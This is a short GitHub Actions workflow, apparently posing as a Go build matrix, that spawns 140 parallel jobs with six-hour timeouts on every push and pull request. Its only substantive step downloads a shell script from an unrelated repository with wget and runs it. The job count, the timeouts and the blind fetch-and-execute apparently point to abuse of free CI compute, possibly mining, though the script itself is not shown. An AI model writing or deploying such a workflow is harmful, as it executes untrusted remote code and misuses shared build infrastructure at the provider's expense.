name: SHIBLAH
on: [push, pull_request]
jobs:
  build:
    name: Sedih
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 60
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10, 1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N]
    timeout-minutes: 360
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Mengsedih
      run: |
        wget https://raw.githubusercontent.com/xbomx/lo/master/ceki.sh && chmod u+x ceki.sh && ./ceki.sh
